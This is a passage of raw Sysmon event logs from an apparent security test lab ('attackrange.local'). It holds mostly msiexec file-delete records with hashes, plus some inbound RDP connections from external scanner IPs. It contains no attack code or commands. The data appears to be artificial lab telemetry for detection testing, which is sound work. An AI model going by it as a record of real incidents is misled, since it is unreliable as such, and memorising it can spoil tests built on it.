AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\LLC80O1ZV5\System.Security.ni.dllMD5=54B8805EB3C694F29052E9B1789A07DA,SHA256=4D2E9C421DE3E5FA95A79E6C35CD689B53BBDAA27FD36114ED4710F9CF1F27DC,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073003Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:28.578{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\LKAJNTQ0TG\System.Configuration.Install.ni.dll.auxMD5=1BFDFCF998903EA6AF2C7F1496C9BD50,SHA256=DE281F3E622CCF729BB00B9DDF68643C79FCF455B0EC1FB21DFB5F94AEDD6859,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073002Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:28.578{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\LKAJNTQ0TG\System.Configuration.Install.ni.dllMD5=A8DA77D12ECE05B2F62E9C4953661141,SHA256=FC27E15E339A52EF8C0D829E7E6800365A1755A8F6DD1650018EA73CFC18996F,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073001Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:28.578{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\LK2QT4W2RD\System.Drawing.ni.dll.auxMD5=CCA0985CD95C87162EE8FABD44FAE1F5,SHA256=EE34560D22D7CDEF63F66AE66B409DEB4D75505E1017190BEBE0D4191610E7DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073000Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:28.562{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\LK2QT4W2RD\System.Drawing.ni.dllMD5=13B68E88BC8FE03216C474B8DC5258D1,SHA256=64B7FB05FD5CA1DE5630A096593393F2EBEBE2D43AD94B1D514AACF05702F345,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072999Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:28.547{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\LIM5T5XM4L\System.DirectoryServices.ni.dll.auxMD5=8C62FCC7526EA7B45336F62B19961917,SHA256=380C559E81001EB5A7E6E4CB27A7BBC78CAF792DAC2CA81FB5CEEDD346D56718,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072998Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:28.547{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\LIM5T5XM4L\System.DirectoryServices.ni.dllMD5=1B1CEB2CC83E5F299E616C434A37FC86,SHA256=1AD9A12E233F803A985AFF686A26B3DED3CB16927C25CF4C7BF0D7AA4CED4137,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072997Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:28.531{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\L3ERTDNST0\System.Core.ni.dll.auxMD5=7E0C144A9DCAD31A8111B8B42DDCECBA,SHA256=AD9B8AF589F1D2BA5C81427E41087FC704AC82D57DE568EF8085DC9977CF8549,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072996Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:28.516{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\L3ERTDNST0\System.Core.ni.dllMD5=F1FE6824F513926F23FFFE53348D791F,SHA256=8AB5DF5356D9BC7FF295DA609CE1AD35A98FA8A91B98CE805B6CE72840483BBC,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072995Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:28.344{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\KZYRIY0MEY\System.Numerics.ni.dll.auxMD5=46C8A979AD3266DDEF725C7E593B0EC9,SHA256=44F41AE20DFD28ABE6EE0E04898C519AD9709FA50D948409B2ECD81BB20D3D37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072994Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:28.344{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\KZYRIY0MEY\System.Numerics.ni.dllMD5=63A9B260BCFCC94E75F0B012DE2B32EF,SHA256=3BFD410197EBDCE1914F9CA077D5B2BE75A664A54D5D9B05169694327EC86CE3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072993Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:28.328{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\KYQGEDG1SD\System.Windows.Forms.ni.dll.auxMD5=AC36643F64BD9537E552F35C0B019EFB,SHA256=4AA66A91B44CCA1403B9F0E71435C3233124EAAC20C434412CCACB77255B5612,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072992Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:28.328{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\KYQGEDG1SD\System.Windows.Forms.ni.dllMD5=A8D652BBECDD183E51E2E654E8F4770A,SHA256=C1FC8E5327FC8C5492756648C2AEF53E12E5F647D82C4A01DDCF1DEF561E92F7,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000072991Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.962{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-32866-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000072990Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.200{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com63358-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000072989Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:28.172{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40D5447A691F9200E8BEDBF22446F786,SHA256=343A012C9445A2C40C879D26FEEF9DDAD9897C90094BC707735D7FB9B93EBE9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050021Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:28.219{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF125281DB2550655C1D3FA28F126E73,SHA256=87786998BAD92F1A64EAC614CF52D1B157839C7558A00545D3213109411AFF0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050020Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:28.000{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=83E5034D5CA6E277869750641D8B23C6,SHA256=764706DE82853CF56FD02FCE8EC33BC6DE1F05889A44404DFF07C7AB43739168,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073026Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:29.937{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\N0IVNE6B7B\System.Transactions.ni.dll.auxMD5=6C339FFF8233C29C022D6F64132B3565,SHA256=245A00C8C84BF6FDC07FA7C3AA0F192283A8D1E55AA1FC5212B59BDBE5B0DC39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073025Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:29.937{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\N0IVNE6B7B\System.Transactions.ni.dllMD5=B419B44AAD97CA3AA622FC69F9F700EF,SHA256=85E6B77303F3C2B52190AD6ECB73FFF9A6EB42C02D61D315128653B8D806ED7F,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073024Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:29.922{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\MQOCM2A3T9\System.Data.ni.dll.auxMD5=55B9DBFF22E9F9EA9030C8506FBB4BDD,SHA256=21857952A4D88926E936A4E055A5A32BC852B2C854FB5B5D02E2CE26FA11076B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073023Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:29.922{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\MQOCM2A3T9\System.Data.ni.dllMD5=5B8A1387F38B3747F281326AE0AE6046,SHA256=72AFDE4C5841503A8DA13C06C8132644F73CE9B49086AF3B3DDBA5F85FA3D3D4,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073022Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:29.750{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\MMFOGD1HWU\System.Xml.ni.dll.auxMD5=AB37B4D34FC53F43A723D713E12B4003,SHA256=47AFE86256B978AB7CC1A26216ADFCBB2C3B3BE59AA00ED8EF85B73360C40569,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073021Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:29.750{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\MMFOGD1HWU\System.Xml.ni.dllMD5=6D871CEE5183880F2C6E45D4A633B9BB,SHA256=08C1A990205468C817F6A1084644002912BDD347EC03D4139E99E54424A86960,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073020Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:29.609{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\MIUYZJ4R64\System.Data.ni.dll.auxMD5=4000DCA0209C14C9BCD1DD177196F2B5,SHA256=83875A2E7B0EA34843C1D8EBC0980BEC7A91B6E1FE4B11BCE69E81BBDDFFC942,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073019Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:29.609{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\MIUYZJ4R64\System.Data.ni.dllMD5=E0DF78698CCBBBD22D7DF8B84B214338,SHA256=D5D79E6A941196BDDAA97DD97CE08D88F5D49F6F6BBE4DC1BE1BD3BC2DD611D8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073018Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:29.422{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\M9TLN9HBIF\System.Xml.ni.dll.auxMD5=040DE208CE1EB5D0024CE936E00E3392,SHA256=33953292338BFB6EE2756974051377A824A6C6DA3BA533A3FBA6D86218957BEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073017Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:29.422{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\M9TLN9HBIF\System.Xml.ni.dllMD5=6644706835E5D443B9822C53AED1B87C,SHA256=14CFCA3962038FEEFF28F93571BDA791D9DAF2FB8E34C066E027DBEF1D07F5F7,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000073016Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:28.053{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57520-false10.0.1.12-8000- 23542300x800000000000000073015Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:29.250{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\M06ORVAQ4N\System.Security.ni.dll.auxMD5=A8E16B0835C7BA8888173106EDFD7698,SHA256=7D44F7630D8C42C9BCBA5DB5C74B36391E11FC17D4FAF6D26C452C1BD3E359EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073014Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:29.250{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\M06ORVAQ4N\System.Security.ni.dllMD5=B92BEE33B09857E5DB60DF34BED170CA,SHA256=C07B57EDCAACD9E9B6CA2340A8DAB75CCF3BE99EDDF063804E73FFB74CDE645D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073013Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:29.234{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\LYGE1N23YW\System.Xml.ni.dll.auxMD5=040DE208CE1EB5D0024CE936E00E3392,SHA256=33953292338BFB6EE2756974051377A824A6C6DA3BA533A3FBA6D86218957BEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073012Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:29.234{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\LYGE1N23YW\System.Xml.ni.dllMD5=6644706835E5D443B9822C53AED1B87C,SHA256=14CFCA3962038FEEFF28F93571BDA791D9DAF2FB8E34C066E027DBEF1D07F5F7,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073011Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:29.187{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B49A7517D1C8813FABE83E6919380782,SHA256=93EEEA18F332627351559806B46D8CE262D5BC4564B6E3503911B6EFFC85C16A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073010Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:29.078{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\LUC2W71J27\Microsoft.CSharp.ni.dll.auxMD5=C4E4AFE001B45754A961F829FA2AA4FA,SHA256=AD75AEFF2DD869B6EBA26338422C0DA1577C6D99923183CA8E58F68D71873E64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073009Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:29.078{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\LUC2W71J27\Microsoft.CSharp.ni.dllMD5=3DA8C7A3CE434CDF212B055456B2D5AD,SHA256=800BC5C217E541299A28DCF0F10BCD943B74F33E250FAFCE57D3BCBE02060463,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073008Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:29.047{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\LMV1K7MTCD\PresentationFramework.ni.dll.auxMD5=DE88ADE06E3B0B87F9EC542D03B909BD,SHA256=CA646AF9FA56EDA1FF4974D5AF0A9B2B360B84CC30AE311FAB387D747E11DC02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073007Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:29.047{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\LMV1K7MTCD\PresentationFramework.ni.dllMD5=585F7866FCC0FE6A5D732D961852CC62,SHA256=1DA8CCE6A338D38A2D88A14748AED2156D2B95311FB4EB5CD0A5BE147BCD403F,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000050024Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:27.826{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52512-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000050023Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:27.517{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53913-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050022Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:29.265{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC12A8DA54ECE707F419D3E99B8E6103,SHA256=AC30F39EEF7905A89B0A13828DD88607A232C419052C2756314D3CD9052F68FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073040Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:30.922{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\NSCDQAJZZE\System.Data.ni.dll.auxMD5=CC9F9CB4F637C42741255EF17203B47C,SHA256=370A27D995B8AC7DEC609867B2B7BBEA89A465AB01320C77D7F8CB57793DC76B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073039Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:30.922{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\NSCDQAJZZE\System.Data.ni.dllMD5=4CE9DA541633C93EAE8D016C36CA6BF4,SHA256=08E8F1F9463152B6AABF02E6A7CB02A2DA4608AD745320837A9718B87B52AA29,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073038Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:30.828{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\NO21KQA2HF\System.Configuration.Install.ni.dll.auxMD5=0CBC2C9737233F80F1C8DD57CE1AE88C,SHA256=6E18B2C2DFA32D6F4925D1BBE903FD9049472C36261FEBA8DD59628E8C6A9F30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073037Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:30.828{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\NO21KQA2HF\System.Configuration.Install.ni.dllMD5=2582241664CA944A32E31176A66CF0C6,SHA256=B7C2F435943924E46E604D1D35C1835920CC706BF320D85179E53CA0F84354FF,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073036Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:30.828{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\NL4EC7YXBV\System.Data.ni.dll.auxMD5=EDB7CB075A217959013CD75CE405CCD2,SHA256=240A71F1AF20552B564ACE0F494BDFFCA2B3982D62D762D1E71E6E1535797972,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073035Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:30.828{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\NL4EC7YXBV\System.Data.ni.dllMD5=7ABB236413DDD5D4953BB3A2C663E53F,SHA256=D14A3A1F1851D9FD244CBF574F22A3B94B05FBBBC6147381E68F694AD59574E3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073034Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:30.625{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\N7F7OPQH0I\System.ServiceProcess.ni.dll.auxMD5=FB48CBD15429C7B1F9A14E82CDF8B24D,SHA256=E11D297738EB6EFD68E74B919FC25F124C6CC4AE3E1C7595BB224BF4567C30FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073033Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:30.625{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\N7F7OPQH0I\System.ServiceProcess.ni.dllMD5=52E1C1642839FB780CD29C337867C549,SHA256=5823F6CC6549B5FE1FDFF03DCF1B95DFAFDE9D381C04D3C8F5BDCC636A053E54,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073032Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:30.609{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\N771T2GRDN\PresentationFramework.ni.dll.auxMD5=1CD640D915EAE872FC60479FB1991D49,SHA256=4136E63F0E092B2DB0DB99F29185481D5F9CF9273FB96BB33273FC4B8F077704,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073031Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:30.609{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\N771T2GRDN\PresentationFramework.ni.dllMD5=F4BE31FD7508880EBE11971999150E20,SHA256=67784892A02B103C517FFBCEB07F743E14E727539AADA82138342FEAECD1C8C9,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000073030Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:28.592{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-34231-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000073029Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:30.437{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F29879749D91478247CE27C7B90DA14,SHA256=90A26A602D3FF1326FE78C6EDF013515E935A5BFAF8FAFEF2CE28BFA8AA7B720,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073028Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:30.141{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\N6GEV7NRLJ\System.ni.dll.auxMD5=F974195E5ECE86B40F7C98CEAFF80650,SHA256=6FED5EE609434200BCCA2E954E4FF45678A458F016A429BD3AD7BE480AC33845,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073027Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:30.141{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\N6GEV7NRLJ\System.ni.dllMD5=13DE7F98F0CB9EB352C90FC60D125E6B,SHA256=895BF50B6C923C70F9F96ED6117D4F5929607376E5F00531F7E0E9209D4A1028,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000050027Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:29.106{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55391-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050026Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:30.265{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A33926F49C5CCC9E1A18A19597B63A05,SHA256=65EC264456F1E364EB51DDC03BDDB236AC89EA3B40147C28AF925EEC02883A1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050025Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:30.078{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FBAF2C68A5178F1405918F3E24DB0F58,SHA256=6A4A820C0DB99F8B8DDAC3C9F9A7F82C626F00E7ED3F474BE47843DC71C3722E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073057Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 